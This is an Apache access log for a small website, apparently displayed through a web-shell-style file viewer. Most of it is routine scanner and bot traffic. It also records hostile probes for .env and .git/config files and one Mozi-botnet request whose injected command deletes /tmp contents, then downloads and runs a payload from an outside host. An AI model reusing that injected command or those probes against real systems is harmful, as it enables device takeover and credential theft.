HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: /home/httpd/logs/sosalty.com_access_log.1
74.206.190.87 - - [04/Apr/2026:01:30:54 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
91.232.238.112 - - [04/Apr/2026:01:33:35 -0400] "GET /robots.txt HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; FreePBX-Scanner/1.0)"
74.206.190.87 - - [04/Apr/2026:01:36:05 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
94.231.206.133 - - [04/Apr/2026:01:36:18 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
74.206.190.87 - - [04/Apr/2026:01:41:24 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
198.235.24.242 - - [04/Apr/2026:01:44:36 -0400] "GET / HTTP/1.1" 302 - "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
176.65.151.74 - - [04/Apr/2026:01:45:14 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.206.190.87 - - [04/Apr/2026:01:45:38 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:01:50:37 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
91.232.238.112 - - [04/Apr/2026:01:54:00 -0400] "GET /robots.txt HTTP/1.1" 302 - "-" "xfa1"
74.206.190.87 - - [04/Apr/2026:01:55:32 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
176.65.151.74 - - [04/Apr/2026:02:00:38 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.206.190.87 - - [04/Apr/2026:02:00:47 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
91.232.238.112 - - [04/Apr/2026:02:01:22 -0400] "GET /robots.txt HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; FreePBX-Scanner/1.0)"
20.64.104.11 - - [04/Apr/2026:02:03:05 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 zgrab/0.x"
74.206.190.87 - - [04/Apr/2026:02:05:29 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:02:10:31 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:02:15:34 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:02:20:46 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:02:25:31 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
176.65.151.74 - - [04/Apr/2026:02:25:55 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.206.190.87 - - [04/Apr/2026:02:30:34 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
149.86.227.60 - - [04/Apr/2026:02:31:45 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0"
74.206.190.87 - - [04/Apr/2026:02:35:34 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:02:40:47 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:02:45:35 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
216.244.66.199 - - [04/Apr/2026:02:50:22 -0400] "GET /robots.txt HTTP/1.1" 403 277 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
74.206.190.87 - - [04/Apr/2026:02:50:32 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
176.65.151.74 - - [04/Apr/2026:02:52:59 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.206.190.87 - - [04/Apr/2026:02:55:34 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
199.195.251.81 - - [04/Apr/2026:02:59:32 -0400] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
95.214.55.244 - - [04/Apr/2026:03:00:04 -0400] "GET /welcome HTTP/1.1" 302 - "-" "-"
74.206.190.87 - - [04/Apr/2026:03:00:48 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
95.214.55.244 - - [04/Apr/2026:03:03:47 -0400] "GET /welcome HTTP/1.1" 302 - "-" "-"
74.206.190.87 - - [04/Apr/2026:03:05:30 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
34.6.200.152 - - [04/Apr/2026:03:05:46 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
198.235.24.164 - - [04/Apr/2026:03:07:09 -0400] "GET / HTTP/1.1" 302 - "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
87.121.84.62 - - [04/Apr/2026:03:09:04 -0400] "GET /public/assets/plugins/plupload/examples/upload.php HTTP/1.1" 302 - "-" "ALittle Client"
74.206.190.87 - - [04/Apr/2026:03:10:42 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
176.65.151.74 - - [04/Apr/2026:03:14:42 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.206.190.87 - - [04/Apr/2026:03:15:42 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:03:21:01 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
83.142.209.157 - - [04/Apr/2026:03:24:33 -0400] "GET / HTTP/1.1" 302 - "-" "-"
74.206.190.87 - - [04/Apr/2026:03:25:58 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
45.148.10.245 - - [04/Apr/2026:03:28:51 -0400] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
45.148.10.245 - - [04/Apr/2026:03:29:05 -0400] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
45.148.10.245 - - [04/Apr/2026:03:29:05 -0400] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
72.255.26.161 - - [04/Apr/2026:03:30:06 -0400] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://72.255.26.161:42086/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1" 302 - "-" "-"
74.206.190.87 - - [04/Apr/2026:03:30:58 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:03:36:00 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
216.244.66.199 - - [04/Apr/2026:03:39:41 -0400] "GET /robots.txt HTTP/1.1" 403 277 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
176.65.151.74 - - [04/Apr/2026:03:40:31 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.206.190.87 - - [04/Apr/2026:03:41:04 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:03:45:56 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:03:50:39 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:03:55:34 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:04:00:42 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
172.232.39.138 - - [04/Apr/2026:04:02:04 -0400] "GET /.env HTTP/1.1" 302 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
172.232.39.138 - - [04/Apr/2026:04:02:05 -0400] "GET /.git/config HTTP/1.1" 302 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
38.54.65.134 - - [04/Apr/2026:04:04:50 -0400] "POST /graphql HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) WormGPT/4.1"
176.65.151.74 - - [04/Apr/2026:04:05:25 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.206.190.87 - - [04/Apr/2026:04:05:31 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"
74.206.190.87 - - [04/Apr/2026:04:10:51 -0400] "GET / HTTP/1.1" 302 - "-" "curl/7.29.0"